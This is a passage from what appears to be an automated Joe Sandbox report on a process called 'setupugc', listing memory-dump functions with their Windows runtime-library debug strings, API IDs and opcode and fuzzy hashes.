                                            • RTL: Re-Waiting, xrefs: 03BF031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03BF02BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03BF02E7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 4bbdd9b78daf8c0fb0193193d0db7a50b50fa04e27bad1ebb7d4326818458442
                                            • Instruction ID: 4d8083c42981de56f50cfcba8137d7bdd6d59e9138c77083415eb8305cc12295
                                            • Opcode Fuzzy Hash: 4bbdd9b78daf8c0fb0193193d0db7a50b50fa04e27bad1ebb7d4326818458442
                                            • Instruction Fuzzy Hash: 11E1AE70608B419FD725DF28C884B6AB7E0FB48318F180ABDF5A58B2E1D774D949CB52
                                            Function 03BBBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03BF7B7F
                                            • RTL: Re-Waiting, xrefs: 03BF7BAC
                                            • RTL: Resource at %p, xrefs: 03BF7B8E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: ace2a5ce43ef28ec2bb3c9ad1e2778f3e3156fe91617c8f164f1d897a3396a66
                                            • Instruction ID: 7e1f5cc8f2f27e547d1e018d911e64f214bb4e96e289487c9eb93ec7b246d14e
                                            • Opcode Fuzzy Hash: ace2a5ce43ef28ec2bb3c9ad1e2778f3e3156fe91617c8f164f1d897a3396a66
                                            • Instruction Fuzzy Hash: 5441E0357047029FDB20CE25C851BAAB7E5EF89718F040ABDE95ADB681DBB0E4058B91
                                            Function 03BBB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03BF728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 03BF72C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03BF7294
                                            • RTL: Resource at %p, xrefs: 03BF72A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 0b8c7665bdf1a47529a8e965c3827021a8ed0c3fd05a7ab4ce5c903d4dc088b1
                                            • Instruction ID: cc91a9842836ef7ff127666a31ede9d3d4562830ccd8acf845ff73852af880bc
                                            • Opcode Fuzzy Hash: 0b8c7665bdf1a47529a8e965c3827021a8ed0c3fd05a7ab4ce5c903d4dc088b1
                                            • Instruction Fuzzy Hash: 9941EF35B00202AFDB20DE25CC42FAAB7A5FB85758F1406A9F955EB280DF70F85687D1
                                            Function 03C32300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: bbde58c2b6aca28e7b60915d5bb652bb970e17a39da4f306e3727ec2cb418184
                                            • Instruction ID: 0af13b818fa84dbed5012aef02924f4f68607c65acda9e04907a9dc491ae33e6
                                            • Opcode Fuzzy Hash: bbde58c2b6aca28e7b60915d5bb652bb970e17a39da4f306e3727ec2cb418184
                                            • Instruction Fuzzy Hash: 99317876A002199FCF60DF29DC50BEEB7FCEF45614F4445A5E849E7240EB30AA449FA1
                                            Function 03BC7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: cf0653f8218f3146259429677bfca3e714eb4827b2479a3d496a43fe7bab950d
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 8491A971E102DA9FDB34DE69C8926BEB7A5EF44318F1845BEE865E72C0DB3089418F50
                                            Function 03B89126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: ef5a3088d93b0fcb214aa2816a2c3a2c141a90e4253730863a95dd91b44031ca
                                            • Instruction ID: 371fe4210db300c576bc636f2d2de60977b8bcd645e54d8139a3360e126066c1
                                            • Opcode Fuzzy Hash: ef5a3088d93b0fcb214aa2816a2c3a2c141a90e4253730863a95dd91b44031ca
                                            • Instruction Fuzzy Hash: 70811975D002699BDF21EF54CC44BEEB7B8AB08754F0445EAA919BB240E7709E84CFA0